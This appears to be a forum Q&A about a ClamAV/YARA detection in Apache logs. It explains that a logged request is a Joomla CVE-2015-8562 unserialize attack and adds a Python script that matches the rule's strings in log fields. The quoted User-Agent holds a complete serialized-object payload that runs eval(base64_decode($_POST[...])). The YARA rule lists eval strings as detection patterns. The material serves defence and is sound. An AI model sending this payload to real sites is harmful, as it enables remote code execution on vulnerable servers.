
My ClamAV scan keeps finding examples of this in my Apache logs: YARA.eval_post.UNOFFICIAL

Does anyone know what it is and what to do about it?

I tried contacting the folks at yararules.com, but I haven't heard anything back.

My log entries look like this:

160.202.162.212 - - [13/Jul/2017:05:53:12 -0400] "GET / HTTP/1.1" 503 299 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:4:\"\\0\\0\\0a\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:5:\"cache\";b:1;s:19:\"cache_name_function\";s:6:\"assert\";s:10:\"javascript\";i:9999;s:8:\"feed_url\";s:54:\"eval(base64_decode($_POST[111]));JFactory::get();exit;\";}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";i:1;}\xf0\x9d\x8c\x86"

The Yara rule that applies says this:

rule eval_post {
    strings:
        $ = "eval(base64_decode($_POST"
        $ = "eval($undecode($tongji))"
        $ = "eval($_POST"
    condition: any of them
}

What is YARA.eval_post.UNOFFICIAL

First, it is a YARA rule, which means that ClamAV has found something it categorizes as malware.

The "UNOFFICIAL" part just means that ClamAV's finding here is "unofficial", which is the case when the malware detection is the result of a non-built-in/default signature. Most probably you are using clamav-unofficial-sigs.

What your log entry is about

"The Joomla Unserialize Vulnerability" (CVE-2015-8562), a method of utilizing malicious content in an HTTP request. Basically, someone is trying to perform a well-known type of attack on your site. If you are using Joomla, be sure it is up to date to stay protected.

Last but not least, it seems that you have scanned Apache's log file and it has found eval(base64_decode($_POST[111])); (as you can see, an attempt to execute whatever is the content of the POST HTTP request). The log file itself does not pose a security threat in any way.

A log file can pose a security threat. Example: nano /var/log/mylog.log and put the bash script content of a virus in it, next chmod +x /var/log/mylog.log, then run the vulnerable script with ./mylog.log – MaXi32 Jun 19 '20 at 07:06
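As an added example (not code from the question, the answer, or ClamAV/YARA), the script below shows what the detection in the answer amounts to: the three literal strings of the quoted eval_post rule are matched as plain substrings, the "any of them" condition is applied, and each hit is reported with the source host and the log field (request line, referer, or User-Agent) that carried it, so an administrator can confirm that the hit is a logged attack attempt rather than a modified file. The Apache combined-format regex, the Hit record, and the sample log lines are assumptions made for this example; the sample lines are constructed (the second one is a shortened form of the User-Agent from the question) and use documentation IP ranges.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Literal strings from the eval_post YARA rule quoted in the question.
# YARA matches them as plain substrings, and "any of them" means one hit suffices.
EVAL_POST_STRINGS = (
    "eval(base64_decode($_POST",
    "eval($undecode($tongji))",
    "eval($_POST",
)

# Apache "combined" log format (assumption for this example):
# host ident user [time] "request" status size "referer" "user-agent"
# Apache writes embedded quotes as \" so the agent field allows backslash escapes.
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" '
    r'"(?P<agent>(?:[^"\\]|\\.)*)"'
)


@dataclass
class Hit:
    line_no: int
    host: str
    matched: str   # which rule string matched
    field: str     # which log field carried it ("raw" if the line did not parse)
    request: str


def parse_combined(line: str) -> Optional[dict]:
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def match_eval_post(text: str) -> Optional[str]:
    """Return the first eval_post string present in text (the rule's 'any of them')."""
    for needle in EVAL_POST_STRINGS:
        if needle in text:
            return needle
    return None


def scan_log(lines) -> List[Hit]:
    """Scan access-log lines and report where the eval_post strings appear."""
    hits: List[Hit] = []
    for n, line in enumerate(lines, 1):
        rec = parse_combined(line)
        if rec is None:
            # Unparseable line: still check the raw bytes, which is all a file scanner sees.
            needle = match_eval_post(line)
            if needle:
                hits.append(Hit(n, "?", needle, "raw", ""))
            continue
        # Attacker-controlled fields that end up in the log file.
        for field in ("request", "referer", "agent"):
            needle = match_eval_post(rec[field])
            if needle:
                hits.append(Hit(n, rec["host"], needle, field, rec["request"]))
                break
    return hits


# Constructed sample log lines for this example (documentation IP ranges).
SAMPLE_LOG = [
    '203.0.113.5 - - [13/Jul/2017:05:52:01 -0400] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    # Shortened form of the User-Agent from the question; the real payload is much longer.
    r'198.51.100.7 - - [13/Jul/2017:05:53:12 -0400] "GET / HTTP/1.1" 503 299 "-" '
    r'"}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:8:\"feed_url\";s:54:\"eval(base64_decode($_POST[111]));JFactory::get();exit;\";}"',
    '203.0.113.9 - - [13/Jul/2017:05:54:00 -0400] "GET /?x=eval($_POST[1]) HTTP/1.1" 404 200 "-" "curl/7.52"',
]

if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(f"line {h.line_no}: {h.host} matched {h.matched!r} in {h.field} ({h.request})")
```

The point of reporting the field is triage: a hit inside the User-Agent or request line of an access log is the server faithfully recording a request it received, which is the answer's conclusion; the response status (503 and 404 in the samples) tells you whether anything was served, and the source host is what you would use for blocking or correlation.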